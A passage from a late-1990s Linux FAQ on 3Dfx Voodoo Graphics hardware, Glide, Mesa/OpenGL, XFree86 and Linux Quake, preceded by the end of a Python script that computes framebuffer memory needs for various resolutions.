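    if sli not in (1, 2) or pixelfx > MAX_FRAMEBUFFER_MB or max(tex1, tex2) > MAX_TEXTURE_MB:
        raise ValueError(f"not a Voodoo Graphics (tm) configuration: {scheme}")
    return sli * (pixelfx + tex1 + tex2)


if __name__ == "__main__":
    for scheme in ("1/2/2/0", "1/2/4/0", "1/2/2/2", "2/2/4/4", "2/4/4/4"):
        print(f"{scheme:8} -> {total_memory_mb(scheme):2d} MB total")
    # The 6.14 cases: 960x720 is charged as 960x736, 4.04 MB, just over 4 MB.
    for w, h, fb, bufs, sli in ((640, 480, 2, 2, 1), (800, 600, 4, 2, 1),
                                (960, 720, 4, 2, 1), (1024, 768, 4, 3, 2),
                                (1280, 960, 4, 2, 2)):
        need = footprint_bytes(w, h, bufs) / MB
        verdict = "ok" if fits(w, h, fb, bufs, sli=sli) else "no"
        print(f"{w}x{h}, {bufs} color buffers + Z, {fb} MB x{sli} SLI: "
              f"{need:.2f} MB -> {verdict}")
```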
Again, Quantum3D claims that<br /> using the floating point 16-bits per pixel (bpp) depth buffering<br /> provides 22-bpp effective Z-buffer precision.<br /><br /><br /> 6.14. What resolutions does the Voodoo Graphics (tm) support?<br /><br /> The Voodoo Graphics (tm) chipset supports up to 4 MB frame buffer<br /> memory. Presuming double buffering and a depth buffer, a 2MB<br /> framebuffer will support a resolution of 640x480. With 4 MB frame<br /> buffer, 800x600 is possible.<br /><br /> Unfortunately 960x720 is not supported. The Voodoo Graphics (tm)<br /> chipset requires that the memory footprint for a particular resolution<br /> be such that both the vertical and the horizontal dimension are<br /> evenly divisible by 32. The video refresh controller, though, can<br /> output any particular resolution, but the "virtual" size required for<br /> the memory footprint must be in dimensions evenly divisible by 32.<br /> So, 960x720 actually requires 960x736 amount of memory, and<br /> 960x736x2x3 = 4.04MBytes.<br /><br /> However, using two boards with SLI, or a dual Pixelfx SLI board means<br /> that each framebuffer will only have to store half of the image. Thus<br /> 2 times 4 MB in SLI mode are good up to 1024x768, which is the maximum<br /> because of the overall hardware design. You will be able to do<br /> 1024x768 triple buffered with Z, but you will not be able to do e.g.<br /> 1280x960 with double buffering.<br /><br /> Note that triple buffering (no VSync synchronization required by the<br /> application), stereo buffering (for interfacing LCD shutters) and<br /> other more demanding setups will severely decrease the available<br /> resolution.<br /><br /><br /><br /> 6.15. What texture sizes are supported?<br /><br /> The maximum texture size for the Voodoo Graphics (tm) chipset is<br /> 256x256, and you have to use powers of two. Note that for really small<br /> textures (e.g. 
16x16) you are better off merging them into a large<br /> texture, and adjusting your effective texture coordinates<br /> appropriately.<br /><br /><br /> 6.16. Does the Voodoo Graphics (tm) support paletted textures?<br /><br /> The Voodoo Graphics (tm) hardware and Glide support the palette<br /> extension to OpenGL. The most recent version of Mesa does support the<br /> GL_EXT_paletted_texture and GL_EXT_shared_texture_palette extensions.<br /><br /><br /><br /> 6.17. What about overclocking?<br /><br /> If you want to put aside considerations about warranty and<br /> overheating, and want to do overclocking to boost performance even<br /> further, there is related info out on the web. The basic mechanism is<br /> to use Glide environment variables to adjust the clock.<br /><br /> Note that the actual recommended clock is board dependent. While the<br /> default clock speed is 50 MHz, the Diamond Monster 3D property sheet<br /> lets you set up a clock of 57 MHz. It all comes down to the design of<br /> a specific board, and which components are used with the Voodoo<br /> Graphics (tm) chipset - most notably access speed of the RAM in<br /> question. If you exceed the limits of your hardware, rendering<br /> artifacts will occur, to say the least. Reportedly, 57 MHz usually<br /> works, while 60 MHz or more is already pushing it.<br /><br /> Increasing the clock frequency also means increasing the waste heat<br /> dissipated in the chips, in a nonlinear dependency (a 10% increase in<br /> frequency means a lot larger increase in heating). In consequence, for<br /> permanent overclocking you might want to educate yourself about ways<br /> to add cooling fans to the board in a way that does not affect<br /> warranty. A very recommendable source is the "3Dfx Voodoo Heat Report"<br /> by Eric van Ballegoie, available on the web.<br /><br /><br /><br /> 6.18. 
Where could I get additional info on Voodoo Graphics (tm)?<br /><br /> There is a FAQ by 3Dfx, which should be available at their web site.<br /> You will find retail information at the following locations:<br /> www.3dfx.com and www.quantum3d.com.<br /><br /> Unofficial sites that have good info are "Voodoo Extreme" at<br /> www.ve3d.com, and "Operation 3Dfx" at www.ve3d.com.<br /><br /><br /><br /> 7. FAQ: Glide? TexUS?<br /><br /> 7.1. What is Glide anyway?<br /><br /> Glide is a proprietary API plus drivers to access 3D graphics<br /> accelerator hardware based on chipsets manufactured by 3Dfx. Glide has<br /> been developed and implemented for DOS, Windows, and Macintosh, and<br /> has been ported to Linux by Daryll Strauss.<br /><br /><br /><br /> 7.2. What is TexUS?<br /><br /> In the distribution is a libtexus.so, which is the 3Dfx Interactive<br /> Texture Utility Software. It is an image processing library and<br /> utility program for preparing images for use with the 3Dfx Interactive<br /> Glide library. Features of TexUS include file format conversion,<br /> MIPmap creation, and support for 3Dfx Interactive Narrow Channel<br /> Compression textures.<br /><br /> The TexUS utility program texus reads images in several popular<br /> formats (TGA, PPM, RGT), generates MIPmaps, and writes the images as<br /> 3Dfx Interactive texture files (see e.g. alpha.3df, as found in the<br /> distribution) or as an image file for inspection. For details on the<br /> parameters for texus, and the API, see the TexUS documentation.<br /><br /><br /><br /> 7.3. Is Glide freeware?<br /><br /> Nope. Glide is neither GPL'ed nor subject to any other public license.<br /> See LICENSE in the distribution for any details. Effectively, by<br /> downloading and using it, you agree to the End User License Agreement<br /> (EULA) on the 3Dfx web site. 
Glide is provided as binary only, and you<br /> should neither use nor distribute any files but the ones released to<br /> the public, if you have not signed an NDA. The Glide distribution<br /> including the test program sources is copyrighted by 3Dfx.<br /><br /> The same is true for all the sources in the Glide distribution. In the<br /> words of 3Dfx: These are not public domain, but they can be freely<br /> distributed to owners of 3Dfx products only. No card, No code!<br /><br /><br /> 7.4. Where do I get Glide?<br /><br /> The entire 3Dfx SDK is available for download off their public web<br /> site located at www.3dfx.com/software/download_glide.html. Anything<br /> else publicly released by 3Dfx is nearby on their website, too.<br /><br /> There is also an FTP site, ftp.3dfx.com. The FTP has a longer timeout,<br /> and some of the larger files have been broken into 3 files (approx.<br /> 3MB each).<br /><br /><br /><br /> 7.5. Is the Glide source available?<br /><br /> Nope. The Glide source is made available only based on a special<br /> agreement and NDA with 3Dfx.<br /><br /><br /> 7.6. Is Linux Glide supported?<br /><br /> Currently, Linux Glide is unsupported. Basically, it is provided under<br /> the same disclaimers as the 3Dfx GL DLL (see below).<br /><br /> However, 3Dfx definitely wants to provide as much support as possible,<br /> and is in the process of setting up some prerequisites. For the time<br /> being, you will have to rely on the 3Dfx newsgroup (see below).<br /><br /> In addition, the Quantum3D web page claims that Linux support (for<br /> Obsidian) is planned for both Intel and AXP architecture systems in<br /> 2H97.<br /><br /><br /><br /> 7.7. Where could I post Glide questions?<br /><br /> There are newsgroups currently available only on the NNTP server<br /> news.3dfx.com run by 3Dfx. These USENET groups are dedicated to 3Dfx<br /> and Glide in general, and will mainly provide assistance for DOS,<br /> Win95, and NT. 
The current list includes:<br /><br /> ______________________________________________________________________<br /> 3dfx.events<br /> 3dfx.games.glquake<br /> 3dfx.glide<br /> 3dfx.glide.linux<br /> 3dfx.products<br /> 3dfx.test<br /> ______________________________________________________________________<br /><br /><br /> and the 3dfx.oem.products.* group for specific boards, e.g.<br /> 3dfx.oem.products.quantum3d.obsidian. Please use<br /> news.3dfx.com/3dfx.glide.linux for all Linux Glide related questions.<br /><br /> A mailing list dedicated to Linux Glide is in preparation for 1Q98.<br /> Send mail to majordomo@gamers.org, no subject, body of the message<br /> info linux-3dfx to get information about the posting guidelines, the<br /> hypermail archive and how to subscribe to the list or the digest.<br /><br /><br /><br /> 7.8. Where to send bug reports?<br /><br /> Currently, you should rely on the newsgroup (see above), that is<br /> news.3dfx.com/3dfx.glide.linux. There is no official support e-mail<br /> set up yet. For questions not specific to Linux Glide, make sure to<br /> use the other newsgroups.<br /><br /><br /> 7.9. Who is maintaining it?<br /><br /> 3Dfx will appoint an official maintainer soon. Currently, the unofficial<br /> maintainer of the Linux Glide port is Daryll Strauss. Please post bug<br /> reports in the newsgroup (above). If you are confident that you found<br /> a bug not previously reported, please mail to Daryll at<br /> daryll@harlot.rb.ca.us<br /><br /><br /> 7.10. How can I contribute to Linux Glide?<br /><br /> You could submit precise bug reports. Providing sample programs to be<br /> included in the distribution is another possibility. A major<br /> contribution would be adding code to the Glide based Mesa Voodoo<br /> driver source. See the section on Mesa Voodoo below.<br /><br /><br /><br /> 7.11. Do I have to use Glide?<br /><br /> Yes. As of now, there is no other Voodoo Graphics (tm) driver<br /> available for Linux. 
At the lowest level, Glide is the only interface<br /> that talks directly to the hardware. However, you can write OpenGL<br /> code without knowing anything about Glide, and use Mesa with the Glide<br /> based Mesa Voodoo driver. It helps to be aware of the involvement of<br /> Glide for recognizing driver limitations and bugs, though.<br /><br /><br /><br /> 7.12. Should I program using the Glide API?<br /><br /> That depends on the application you are heading for. Glide is a<br /> proprietary API that is partly similar to OpenGL or Mesa, partly<br /> contains features only available as EXTensions to some OpenGL<br /> implementations, and partly contains features not available anywhere<br /> but within Glide.<br /><br /> If you want to use the OpenGL API, you will need Mesa (see below).<br /> Mesa, namely the Mesa Voodoo driver, offers an API resembling the well<br /> documented and widely used OpenGL API. However, the Mesa Voodoo driver<br /> is in early alpha, and you will have to accept performance losses and<br /> lack of support for some features.<br /><br /> In summary, the decision is up to you - if you are heading for maximum<br /> performance while accepting potential problems with porting to<br /> non-3Dfx hardware, Glide is not a bad choice. If you care about<br /> maintenance, OpenGL might be the best bet in the long run.<br /><br /><br /><br /> 7.13. What is the Glide current version?<br /><br /> The current version of Linux Glide is 2.4. The next version will<br /> probably be identical to the current version for DOS/Windows, which is<br /> 2.4.3, which comes in two distributions. Right now, various parts of<br /> Glide are different for Voodoo Rush (tm) (VR) and Voodoo Graphics (tm)<br /> (VG) boards. Thus you have to pick up separate distributions (under<br /> Windows) for VR and VG. The same will be true for Linux. 
There will<br /> possibly be another chunk of code and another distribution for Voodoo<br /> 2 (tm) (V2) boards.<br /><br /> There is also a Glide 3.0 in preparation that will extend the API for<br /> use of triangle fans and triangle strips, and provide better state<br /> change optimization. Support for fans and strips will in some<br /> situations significantly reduce the amount of data sent per triangle,<br /> and the Mesa driver will benefit from this, as the OpenGL API has<br /> separate modes for this. For a detailed explanation on this see e.g.<br /> the OpenGL documentation.<br /><br /><br /><br /> 7.14. Does it support multiple Texelfx already?<br /><br /> Multiple Texelfx/TMU's can be used for single pass trilinear<br /> mipmapping for improved image quality without performance penalty<br /> in current Linux Glide already. You will need a board with two Texelfx<br /> (that is, one of the appropriate Quantum3D Obsidian boards). The<br /> application needs to specify the use of both Texelfx accordingly, it<br /> does not happen automatically.<br /><br /> Note that because most applications are implemented for consumer<br /> boards with a single Texelfx, they might not query the presence of a<br /> second Texelfx, and thus not use it. This is not a flaw of Glide but<br /> of the application.<br /><br /><br /><br /> 7.15. Is Linux Glide identical to DOS/Windows Glide?<br /><br /> The publicly available version of Linux Glide should be identical to<br /> the respective DOS/Windows versions. Delays in releasing the Linux<br /> port of newer DOS/Windows releases are possible.<br /><br /><br /> 7.16. Where do I get information on Glide?<br /><br /> There is exhaustive information available from 3Dfx. You could<br /> download it from their home page at<br /> www.3dfx.com/software/download_glide.html. These are for free,<br /> presuming you bought a 3Dfx hardware based board. 
Please read the<br /> licensing regulations.<br /><br /> Basically, you should look for some of the following:<br /><br /> o Glide Release Notes<br /><br /> o Glide Programming Guide<br /><br /> o Glide Reference Manual<br /><br /> o Glide Porting Guide<br /><br /> o TexUs Texture Utility Software<br /><br /> o ATB Release Notes<br /><br /> o Installing and Using the Obsidian<br /><br /> These are available as Microsoft Word documents, and part of the<br /> Windows Glide distribution, i.e. the self-extracting archive file.<br /> Postscript copies for separate download should be available at<br /> www.3dfx.com as well. Note that the release numbers are not always<br /> in sync with those of Glide.<br /><br /><br /><br /> 7.17. Where to get some Glide demos?<br /><br /> You will find demo sources for Glide within the distribution (test<br /> programs), and on the 3Dfx home page. The problem with the latter is<br /> that some require ATB. To port these demos to Linux, the event<br /> handling has to be completely rewritten.<br /><br /> In addition, you might find some of the OpenGL demo sources<br /> accompanying Mesa and GLUT useful. While the Glide API is different from the<br /> OpenGL API, they target the same hardware rendering pipeline.<br /><br /><br /><br /> 7.18. What is ATB?<br /><br /> Some of the 3Dfx demo programs for Glide depend not only on Glide but<br /> also on 3Dfx's proprietary Arcade Toolbox (ATB), which is available<br /> for DOS and Win32, but has not been ported to Linux. If you are a<br /> developer, the sources are available within the Total Immersion<br /> program, so porting ATB to Linux would be possible.<br /><br /><br /><br /> 8. FAQ: Glide and XFree86?<br /><br /><br /> 8.1. 
Does it run with XFree86?<br /><br /> Basically, the Voodoo Graphics (tm) hardware does not care about X.<br /> The X server will not even notice that the video signal generated by<br /> the VGA hardware does not reach the display in single screen<br /> configurations. If your application is not written X-aware, Glide<br /> switching to full screen mode might cause problems (see<br /> troubleshooting section). If you do not want the overhead of writing<br /> an X11-aware application, you might want to use SVGA console mode<br /> instead.<br /><br /> So yes, it does run with XFree86, but no, it is not cooperating if you<br /> don't write your application accordingly. You can use the Mesa "window<br /> hack", which will be significantly slower than fullscreen, but still a<br /> lot faster than software rendering (see section below).<br /><br /><br /><br /> 8.2. Does it only run full screen?<br /><br /> See above. The Voodoo Graphics (tm) hardware is not window environment<br /> aware, neither is Linux Glide. Again, the experimental Mesa "window<br /> hack" covered below will allow for pasting the Voodoo Graphics (tm)<br /> board framebuffer's content into an X11 window.<br /><br /><br /><br /> 8.3. What is the problem with AT3D/Voodoo Rush (tm) boards?<br /><br /> There is an inherent problem when using Voodoo Rush (tm) boards with<br /> Linux: Basically, these boards are meant to be VGA 2D/3D accelerator<br /> boards, either as a single board solution, or with a Voodoo Rush (tm)<br /> based daughterboard used transparently. The VGA component tied to the<br /> Voodoo Rush (tm) is Alliance Semiconductor's ProMotion-AT3D<br /> multimedia accelerator. To use this e.g. with XFree86 at all, you<br /> need a driver for the AT3D chipset.<br /><br /> There is a mailing list on this, and a web site with FAQ at<br /> www.frozenwave.com/linux-stingray128. Look there for most current<br /> info. 
There is a SuSE maintained driver at<br /> ftp.suse.com/suse_update/special/xat3d.tgz. Reportedly, the XFree86<br /> SVGA server also works, supporting 8, 16 and 32 bpp. Official support<br /> will probably be in XFree86 4.0. XFree86 decided to prepare an<br /> intermediate XFree86 3.3.2 release as well, which might already<br /> address the issues.<br /><br /> The following XF86Config settings reportedly work.<br /><br /> ______________________________________________________________________<br /> # device section settings<br /> Chipset "AT24"<br /> Videoram 4032<br /><br /> # videomodes tested by Oliver Schaertel<br /> # 25.18 28.32 for 640 x 480 (70hz)<br /> # 61.60 for 1024 x 786 (60hz)<br /> # 120 for 1280 x 1024 (66hz)<br /> ______________________________________________________________________<br /><br /><br /> In summary, there is nothing prohibiting this except for the fact that<br /> the drivers in XFree86 are not yet finished.<br /><br /> If you want a more technical explanation: Voodoo Rush (tm) support<br /> requires X server changes to support grabbing a buffer area in the<br /> video memory on the AT3D board, as the Voodoo Rush (tm) based boards<br /> need to store their back buffer and z buffer there. This memory<br /> allocation and locking requirement is not a 3Dfx specific problem, it<br /> is also needed e.g. for support of TV capture cards, and is thus under<br /> active development for XFree86. This means changes at the device<br /> dependent X level (thus XAA), which are currently implemented as an<br /> extension to XFree86 DGA (Direct Graphics Access, an X11 extension<br /> proposal implemented in different ways by Sun and XFree86, that is not<br /> part of the final X11R6.1 standard and thus not portable). It might be<br /> part of an XFree86 GLX implementation later on. 
The currently<br /> distributed X servers assume they have full control of the<br /> framebuffer, and use anything that is not used by the visual region of<br /> the framebuffer as pixmap cache, e.g. for caching fonts.<br /><br /><br /><br /> 8.4. What about GLX for XFree86?<br /><br /> There are a couple of problems.<br /><br /> The currently supported Voodoo Graphics (tm) hardware and the<br /> available revision of Linux Glide are full screen only, and not set up<br /> to share a framebuffer with a window environment. Thus GLX or other<br /> integration with X11 is not yet possible.<br /><br /> The Voodoo Rush (tm) might be capable of cooperating with XFree86<br /> (that is, an SVGA compliant board will work with the XFree86 SVGA<br /> server), but it is not yet supported by Linux Glide, nor do S3 or<br /> other XFree86 servers support these boards yet.<br /><br /> In addition, GLX is tied to OpenGL or, in the Linux case, to Mesa.<br /> The XFree86 team is currently working on integrating Mesa with their X<br /> Server. GLX is in beta, XFree86 3.3 has the hooks for GLX. See Steve<br /> Parker's GLX pages at www.cs.utah.edu/~sparker/xfree86-3d/ for the<br /> most recent information. Moreover, there is a joint effort by XFree86<br /> and SuSE, which includes a GLX, see www.suse.de/~sim/. Currently,<br /> Mesa still uses its GLX emulation with Linux.<br /><br /><br /><br /> 8.5. Glide and commercial X Servers?<br /><br /> I have not received any mail regarding use of Glide and/or Mesa with<br /> commercial X Servers. I would be interested to get confirmation on<br /> this, especially on Mesa and Glide with a commercial X Server that has<br /> GLX support.<br /><br /><br /><br /> 8.6. Glide and SVGA?<br /><br /> You should have no problems running Glide based applications either<br /> single or dual screen using VGA modes. 
It might be a good idea to set<br /> up the 640x480 resolution in the SVGA modes, too, if you are using a<br /> single screen setup.<br /><br /><br /> 8.7. Glide and GGI?<br /><br /> A GGI driver for Glide is under development by Jon M. Taylor, but has<br /> not officially been released and was put on hold till completion of<br /> GGI 0.0.9. For information about GGI see synergy.caltech.edu/~ggi/.<br /> If you are adventurous, you might find the combination of XGGI (a GGI<br /> based X Server for XFree86) and GGI for Glide an interesting prospect.<br /> There is also a GGI driver interfacing the OpenGL API; tested with<br /> unaccelerated Mesa. Essentially, this means X11R6 running on a Voodoo<br /> Graphics (tm), using either Mesa or Glide directly.<br /><br /><br /><br /> 9. FAQ: OpenGL/Mesa?<br /><br /><br /><br /> 9.1. What is OpenGL?<br /><br /> OpenGL is an immediate mode graphics programming API originally<br /> developed by SGI based on their previous proprietary Iris GL, and<br /> became an industry standard several years ago. It is defined and<br /> maintained by the Architectural Revision Board (ARB), an organization<br /> that includes members such as SGI, IBM, DEC, and Microsoft.<br /><br /> OpenGL provides a complete feature set for 2D and 3D graphics<br /> operations in a pipelined hardware accelerated architecture for<br /> triangle and polygon rendering. In a broader sense, OpenGL is a<br /> powerful and generic toolset for hardware assisted computer graphics.<br /><br /><br /><br /> 9.2. 
Where to get additional information on OpenGL?<br /><br /> The official site for OpenGL, maintained by the members of the ARB, is<br /> www.opengl.org.<br /><br /> A most recommended site is Mark Kilgard's Gateway to OpenGL Info at<br /> reality.sgi.com/mjk_asd/opengl-links.html: it provides pointers to<br /> books, online manual pages, GLUT, GLE, Mesa, ports to several OS, tons<br /> of demos and tools.<br /><br /> If you are interested in game programming using OpenGL, there is the<br /> OpenGL-GameDev-L@fatcity.com list at Listserv@fatcity.com. Be warned, this<br /> is a high traffic list with very technical content, and you will<br /> probably prefer to use procmail to handle the 100 messages per day<br /> coming in. You cut down bandwidth using the SET OpenGL-GameDev-L<br /> DIGEST command. It is also not appropriate if you are looking for<br /> introductions. The archive is handled by the ListServ software, use<br /> the INDEX OpenGL-GameDev-L and GET OpenGL-GameDev-L "filename"<br /> commands to get a preview before subscribing.<br /><br /><br /><br /> 9.3. Is Glide an OpenGL implementation?<br /><br /> No, Glide is a proprietary 3Dfx API with several features specific to<br /> the Voodoo Graphics (tm) and Voodoo Rush (tm). A 3Dfx OpenGL is in<br /> preparation (see below). Several Glide features would require<br /> EXTensions to OpenGL, some of which are already found in other<br /> implementations (e.g. paletted textures).<br /><br /> The closest thing to a hardware accelerated Linux OpenGL you could<br /> currently get is Brian Paul's Mesa along with David Bucciarelli's Mesa<br /> Voodoo driver (see below).<br /><br /><br /><br /> 9.4. Is there an OpenGL driver from 3Dfx?<br /><br /> Both the 3Dfx website and the Quantum3D website announced OpenGL for<br /> Voodoo Graphics (tm) to be available 4Q97. 
The driver is currently in<br /> Beta, and accessible only to registered developers under written<br /> Beta test agreement.<br /><br /> A Linux port has not been announced yet.<br /><br /><br /><br /> 9.5. Is there a commercial OpenGL for Linux and 3Dfx?<br /><br /> I am not aware of any third party commercial OpenGL that supports the<br /> Voodoo Graphics (tm). Last time I paid attention, neither MetroX nor<br /> XInside OpenGL did.<br /><br /><br /><br /> 9.6. What is Mesa?<br /><br /> Mesa is a free implementation of the OpenGL API, designed and written<br /> by Brian Paul, with contributions from many others. Its performance is<br /> competitive, and while it is not officially certified, it is an almost<br /> fully compliant OpenGL implementation conforming to the ARB<br /> specifications - more complete than some commercial products out,<br /> actually.<br /><br /><br /><br /> 9.7. Does Mesa work with 3Dfx?<br /><br /> The latest Mesa release works with Linux Glide 2.4. In fact,<br /> support was included in earlier versions, however, this driver is<br /> still under development, so be prepared for bugs and less than optimal<br /> performance. It is steadily improving, though, and bugs are usually<br /> fixed very fast.<br /><br /> You will need to get the Mesa library archive from the<br /> iris.ssec.wisc.edu FTP site. It is recommended to subscribe to the<br /> mailing list as well, especially when trying to track down bugs,<br /> hardware, or driver limitations. Make sure to get the most recent<br /> distribution. A Mesa-3.0 is in preparation.<br /><br /><br /><br /> 9.8. How portable is Mesa with Glide?<br /><br /> It is available for Linux and Win32, and any application based on Mesa<br /> will only have the usual system specific code, which should usually<br /> mean XWindows vs. Windows, or GLX vs. WGL. If you use e.g. GLUT or Qt,<br /> you should get away without any system specifics at all for<br /> most applications. 
There are only a few issues (like sampling relative<br /> mouse movement) that are not addressed by the available portable GUI<br /> toolkits.<br /><br /> Mesa/Glide is also available for DOS. The port, which is 32-bit DOS, is<br /> maintained by Charlie Wallace and kept up to date with the main Mesa<br /> base. See www.geocities.com/~charlie_x/ for the most current releases.<br /><br /><br /><br /> 9.9. Where to get info on Mesa?<br /><br /> The Mesa home page is at www.ssec.wisc.edu/~brianp/Mesa.html. There<br /> is an archive of the Mesa mailing list at www.iqm.unicamp.br/mesa/.<br /> This list is not specific to 3Dfx and Glide, but if you are interested<br /> in using 3Dfx hardware to accelerate Mesa, it is a good place to<br /> start.<br /><br /><br /> 9.10. Where to get information on Mesa Voodoo?<br /><br /> For latest information on the Mesa Voodoo driver maintained by David<br /> Bucciarelli tech.hmw@plus.it see the home page at www-<br /> hmw.caribel.pisa.it/fxmesa/.<br /><br /> 9.11. Does Mesa support multitexturing?<br /><br /> Not yet (as of Mesa 2.6), but it is on the list. In Mesa you will<br /> probably have to use the OpenGL EXT_multitexture extension once it is<br /> available. There is no final specification for multitextures in<br /> OpenGL, which is supposed to be part of the upcoming OpenGL 1.2<br /> revision. There might be a Glide driver specific implementation of the<br /> extension in upcoming Mesa releases, but as long as only certain<br /> Quantum3D Obsidian boards come with multiple TMU's, it is not a top<br /> priority. This will surely change once Voodoo 2 (tm) based boards are<br /> in widespread use.<br /><br /><br /><br /> 9.12. Does Mesa support single pass trilinear mipmapping?<br /><br /> Multiple TMU's should be used for single pass trilinear mipmapping for<br /> improved image quality without performance penalty in current Linux<br /> Glide already. 
Mesa support is not yet done (as of Mesa 2.6), but is<br /> in preparation.<br /><br /><br /><br /> 9.13. What is the Mesa "Window Hack"?<br /><br /> The most recent revisions of Mesa contain an experimental feature for<br /> Linux XFree86. Basically, the GLX emulation used by Mesa copies the<br /> contents of the Voodoo Graphics (tm) board's most recently finished<br /> framebuffer content into video memory on each glXSwapBuffers call.<br /> This feature is also available with Mesa for Windows.<br /><br /> This obviously puts some drain on the PCI, doubled by the fact that<br /> this uses X11 MIT SHM, not XFree86 DGA to access the video memory. The<br /> same approach could theoretically be used with e.g. SVGA. The major<br /> benefit is that you could use a Voodoo Graphics (tm) board for<br /> accelerated rendering into a window, and that you don't have to use<br /> the VGA passthrough mode (video output of the VGA board deteriorates in<br /> passing through, which is very visible with high end monitors like<br /> e.g. EIZO F784-T).<br /><br /> Note that this experimental feature is NOT Voodoo Rush (tm) support by<br /> any means. 
It applies only to the Voodoo Graphics (tm) based boards.<br /> Moreover, you need to use a modified GLUT, as interfacing the window<br /> management system and handling the events appropriately has to be done<br /> by the application; it is not handled in the driver.<br /><br /> Make really sure that you have enabled the following environment<br /> variables:<br /><br /> ______________________________________________________________________<br /> export SST_VGA_PASS=1 # to stop video signal switching<br /> export SST_NOSHUTDOWN=1 # to stop video signal switching<br /> export MESA_GLX_FX="window" # to initiate Mesa window mode<br /> ______________________________________________________________________<br /><br /><br /> If you manage to forget one of the SST variables, your VGA board will<br /> be shut off, and you will lose the display (but not the actual X). It<br /> is pretty hard to get that back while being effectively blind.<br /><br /> Finally, note that the libMesaGL.a (or .so) library can contain<br /> multiple client interfaces. I.e. the GLX, OSMesa, and fxMesa (and<br /> even SVGAMesa) interfaces can all be compiled into the same<br /> libMesaGL.a. The client program can use any of them freely, even<br /> simultaneously if it's careful.<br /><br /><br /><br /> 9.14. How about GLUT?<br /><br /> Mark Kilgard's GLUT distribution is a very good place to get sample<br /> applications plus a lot of useful utilities. You will find it at<br /> reality.sgi.com/mjk_asd/glut3/, and you should get it anyway. The<br /> current release is GLUT 3.6, and discussion on a GLUT 3.7 (aka<br /> GameGLUT) has begun. Note that Mark Kilgard has left SGI recently, so<br /> the archive might move some time this year; for the time being it<br /> will be kept at SGI.<br /><br /> There is also a GLUT mailing list, glut@perp.com. 
Send mail to<br /> majordomo@perp.com, with one of the following in the body of your<br /> email message:<br /><br /> ______________________________________________________________________<br /> help<br /> info glut<br /> subscribe glut<br /> end<br /> ______________________________________________________________________<br /><br /><br /><br /> As GLUT handles double buffers, windows, events, and other operations<br /> closely tied to hardware and operating system, using GLUT with Voodoo<br /> Graphics (tm) requires support, which is currently in development<br /> within GLX for Mesa. It already works for most cases.<br /><br /><br /><br /> 10. FAQ: But Quake?<br /><br /> 10.1. What about that 3Dfx GL driver for Quake?<br /><br /> The 3Dfx Quake GL, aka mini-driver, aka miniport, aka Game GL, aka<br /> 3Dfx GL alpha, implemented only a Quake-specific subset of OpenGL (see<br /> http://www.cs.unc.edu/~martin/3dfx.html for an unofficial list of<br /> supported code paths). It is not supported, and not updated anymore.<br /> It was a Win32 DLL (opengl32.dll) released by 3Dfx and was available<br /> for Windows only. This DLL is not, and will not be, ported to Linux.<br /><br /><br /> 10.2. Is there a 3Dfx based glQuake for Linux?<br /><br /> Yes. A Quake linuxquake v0.97 binary has been released based on Mesa<br /> with Glide. The Quake2 q2test binary for Linux and Voodoo Graphics<br /> (tm) has been made available as well. A full Quake2 for Linux was<br /> released in January 1998, with linuxquake2-3.10. Dave "Zoid" Kirsch is<br /> the official maintainer of all Linux ports of Quake, Quakeworld, and<br /> Quake2, including all the recent Mesa based ports. Note that all Linux<br /> ports, including the Mesa based ones, are not officially supported by<br /> id Software.<br /><br /> See ftp.idsoftware.com/idstuff/quake/unix/ for the latest releases.<br /><br /><br /><br /> 10.3. 
Does glQuake run in an XFree86 window?<br /><br /> A revision of Mesa and the Mesa-based Linux glQuake is in preparation.<br /> Mesa already does support this by GLX, but Linux glQuake does not use<br /> GLX.<br /><br /><br /><br /> 10.4. Known Linux Quake problems?<br /><br /> Here is an excerpt, as of January 7th, 1998. I omitted most stuff not<br /> specific to 3Dfx hardware.<br /><br /> o You really should run Quake2 as root when using the SVGALib and/or<br /> GL renderers. You don't have to run as root for the X11 refresh, but<br /> the modes on the mouse and sound devices must be read/writable by<br /> whatever user you run it as. The dedicated server requires no special<br /> permissions.<br /><br /> o X11 has some garbage on the screen when 'loading'. This is normal<br /> in 16bit color mode. X11 doesn't work in 24bit (TrueColor). It<br /> would be very slow in any case.<br /><br /> o Some people are experiencing crashes with the GL renderer. Make<br /> sure you install the libMesa that comes with Quake2! Older versions<br /> of libMesa don't work properly.<br /><br /> o If you experience video 'lag' in the GL renderer (the frame<br /> rate feels like it's lagging behind your mouse movement) type<br /> "gl_finish 1" in the console. This forces an update on a per frame<br /> basis.<br /><br /> o When running the GL renderer, make sure you have killed selection<br /> and/or gpm or the mouse won't work, as they won't "release" it while<br /> Quake2 is running in GL mode.<br /><br /><br /> 10.5. Known Linux Quake security problems?<br /><br /> As Dave Kirsch posted on January 28th, 1998: an exploit for Quake2<br /> under Linux has been published. Quake2 is using shared libraries.<br /> While the README so far does not specifically mention it, note that<br /> Quake2 should not be setuid.<br /><br /> If you want to use the ref_soft and ref_gl renderers, you should run<br /> Quake2 as root. Do not make the binary setuid. 
You can only run both<br /> those renderers at the console, so being root is not that much of<br /> an issue.<br /><br /> The X11 renderer does not need any root permissions (if /dev/dsp is<br /> writable by others for sound). The dedicated server mode does not<br /> need to be root either, obviously.<br /><br /> Problems such as root requirements for games have been sort of a sore<br /> spot in Linux for a number of years now. This is one of the goals that<br /> e.g. GGI is targeting to fix. A ref_ggi might be supported in the<br /> near future.<br /><br /><br /> 10.6. Does LinuxQuake use multitexturing?<br /><br /> To my understanding, glQuake will use a multitexture EXTension if the<br /> OpenGL driver in question offers it. The current Mesa implementation<br /> and the Glide driver for Linux do not yet support this extension, so<br /> for the time being the answer is no. See the section on Mesa and<br /> multitexturing for details.<br /><br /><br /> 10.7. Where can I get current information on Linux glQuake?<br /><br /> Try some of these sites: the "The Linux Quake Resource" at<br /> linuxquake.telefragged.com, or the "Linux Quake Page" at<br /> www.planetquake.com/threewave/linux/. Alternatively, you could look<br /> for Linux Quake sites in the "SlipgateCentral" database at<br /> www.slipgatecentral.com.<br /><br /><br /><br /> 11. FAQ: Troubleshooting?<br /><br /> 11.1. Has this hardware been tested?<br /><br /> See the hardware requirements list above. I currently do not maintain a<br /> conclusive list of vendors and boards, as no particular board specific<br /> problems have been verified. Currently, only 3Dfx and Quantum3D<br /> provide boards for testing to the developers, so Quantum3D consumer<br /> boards are a safe bet. Every other Voodoo Graphics (tm) based board<br /> should work, too. 
